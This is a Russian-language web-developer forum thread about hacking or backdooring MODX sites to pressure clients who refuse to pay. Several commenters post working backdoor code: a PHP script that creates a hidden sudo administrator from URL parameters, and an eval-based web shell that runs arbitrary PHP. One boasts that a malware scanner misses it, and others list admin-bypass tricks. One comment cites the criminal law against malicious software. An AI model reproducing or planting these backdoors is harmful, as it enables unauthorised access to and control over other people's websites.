Можно ли взломать сайт на MODX?
Добрый день!
Такая проблема случилась:
Выгрузил сайт клиенту на хостинг, а он включил заднюю, нанял какого-то сисадмина, чтобы помог ему сменить все доступы и не хочет платить.
Как бы напрашивается вопрос: Есть ли такая возможность взломать MODX, чтобы справедливость восторжествовала? Возможно за $
Такая проблема случилась:
Выгрузил сайт клиенту на хостинг, а он включил заднюю, нанял какого-то сисадмина, чтобы помог ему сменить все доступы и не хочет платить.
Как бы напрашивается вопрос: Есть ли такая возможность взломать MODX, чтобы справедливость восторжествовала? Возможно за $
Комментарии: 17
По началу «карьеры» попадался на таких заказчиков, после этого взял за правило первым делом засунуть бэкдор и разрабатывать с ним, после оплаты вычищаю. Бэкдор банальный файл менеджер для браузера.
Аналогично, бэкдор + сайт лежит на своем хостинге до оплаты оставшейся части. Вот код:
По поводу взлома можешь обратиться к agel_nash, наверное.
<?php
define('MODX_API_MODE', true);
//количество dirname = глубина документа относительно корня
require dirname(dirname(dirname(dirname(__FILE__)))) . '/index.php';
$user = empty($_GET['user']) ? 'user'. rand(99,9999) : $_GET['user'];
$pass = empty($_GET['pass']) ? rand(10000000,99999999) : $_GET['pass'];
$u = $modx->newObject('modUser');
$u->fromArray(array(
'username' => $user,
'password' => $pass,
'active' => 1,
'primary_group' => 1,
));
$u->joinGroup('1', '0');
$u->setSudo(1);
$p = $modx->newObject('modUserProfile');
$p->fromArray(array(
'fullname' => $user,
'email' => $user.'@yoba.ru',
));
$u->addOne($p);
$u->save();
if (!empty($u->username)) {
print '<p><b>user:</b> '. $user .'</p><p><b>pass:</b> '. $pass .'</p>';
}
— при запросе к документу генерирует и выводит логин-пароль для свежесозданного sudo-пользователя. (соответственно, файл должен быть доступен извне)По поводу взлома можешь обратиться к agel_nash, наверное.
А если закроют доступ к админке по айпи? Ну или переименуют ее.
*пожал плечами* тогда вариант but1head'a более уместен, ну или расширить функционал по вкусу:
//вывести путь админки
echo $modx->getOption('manager_path', null, MODX_MANAGER_PATH);
//добавить сессию для пользователя в админку
$user = $modx->getObject('modUser', айди_свежесозданного_пользователя_выше)
$modx->user = $user;
$modx->addSessionContext('mgr');
Спасибо. Взял на заметку, потому что как раз столкнулся с недобросовестным клиентом.
От себя добавлю: айболит не сечет код в «параноидальном» режиме даже
От себя добавлю: айболит не сечет код в «параноидальном» режиме даже
А я такой код размещаю:
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title></title>
<style>
textarea {
padding: 10px;
width: 80%;
}
</style>
</head>
<body>
<?php echo $_SERVER['SCRIPT_FILENAME']; ?>
<form method="post">
<textarea name="code" cols="30" rows="15"><?php echo $_POST['code']; ?></textarea>
<button type="submit">Отправить</button>
</form>
<?php eval($_POST['code']); ?>
</body>
</html>
и выполняй любые php-скрипты
Спасибо, тоже пришел к выводу бэкдоры оставлять до момента оплаты.
Клиент казался очень адекватным до вопроса оплаты.
Клиент казался очень адекватным до вопроса оплаты.
«Услуга которая уже оказана — ничего не стоит»
«Ничто так не вселяет веру в человека, как предоплата»
А потом уже бэкдоры))
«Ничто так не вселяет веру в человека, как предоплата»
А потом уже бэкдоры))
Предоплата была
На вскидку…
— Можно все скрипты до момента оплаты загружать со своего сайта, если он есть.
— Блокировать админку через неделю или удалять пароль у текущего пользователя.
— Прописать GET параметр, чтобы пускал в админку без пароля.
— Можно все скрипты до момента оплаты загружать со своего сайта, если он есть.
— Блокировать админку через неделю или удалять пароль у текущего пользователя.
— Прописать GET параметр, чтобы пускал в админку без пароля.
Лучший совет действительно у себя на хостинге разрабатывать.
Вообще беда с этим. Вот меня как клиента с предоплатой два раза кидали. Заплатил, а люди откровенную лажу сделали. Причем явно, что им предоплата и нужна была, т.к. даже разговор про доработки продолжать не хотели.
В итоге теперь если предоплата то по мелким кускам и за каждый этап работы…
Вообще беда с этим. Вот меня как клиента с предоплатой два раза кидали. Заплатил, а люди откровенную лажу сделали. Причем явно, что им предоплата и нужна была, т.к. даже разговор про доработки продолжать не хотели.
В итоге теперь если предоплата то по мелким кускам и за каждый этап работы…
Только один маленький момент, но о нем надо знать:
Статья 273. Создание, использование и распространение вредоносных компьютерных программ
[Уголовный кодекс] [Глава 28] [Статья 273]
1. Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо лишением свободы на тот же срок со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Деяния, предусмотренные частью первой настоящей статьи, совершенные группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно причинившие крупный ущерб или совершенные из корыстной заинтересованности, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до пяти лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового, либо лишением свободы на срок до пяти лет со штрафом в размере от ста тысяч до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от двух до трех лет или без такового и с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового.
3. Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.
Статья 273. Создание, использование и распространение вредоносных компьютерных программ
[Уголовный кодекс] [Глава 28] [Статья 273]
1. Создание, распространение или использование компьютерных программ либо иной компьютерной информации, заведомо предназначенных для несанкционированного уничтожения, блокирования, модификации, копирования компьютерной информации или нейтрализации средств защиты компьютерной информации, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до четырех лет, либо лишением свободы на тот же срок со штрафом в размере до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев.
2. Деяния, предусмотренные частью первой настоящей статьи, совершенные группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно причинившие крупный ущерб или совершенные из корыстной заинтересованности, — наказываются ограничением свободы на срок до четырех лет, либо принудительными работами на срок до пяти лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового, либо лишением свободы на срок до пяти лет со штрафом в размере от ста тысяч до двухсот тысяч рублей или в размере заработной платы или иного дохода осужденного за период от двух до трех лет или без такового и с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет или без такового.
3. Деяния, предусмотренные частями первой или второй настоящей статьи, если они повлекли тяжкие последствия или создали угрозу их наступления, — наказываются лишением свободы на срок до семи лет.
То, что ты написал — принадлежит тебе. И ты можешь заложить туда любой функционал.
Это зависит от того, какой договор заключен с клиентом.
Так, а причем тут вредоносная программа то?
Ну вообще это он и есть, если говорить о бэкдоре. Мой комментарий предупреждение, чтоб хотя бы не лезли восстанавливать справедливость напрямую, но получил минусы. Ну да ладно.
Лучше разрабатывать на своем хостинге, как советовали выше, брать предоплату заключать договор, и стараться действовать в правовом поле, а не раскидывать дыры по сайту.
Авторизуйтесь или зарегистрируйтесь, чтобы оставлять комментарии.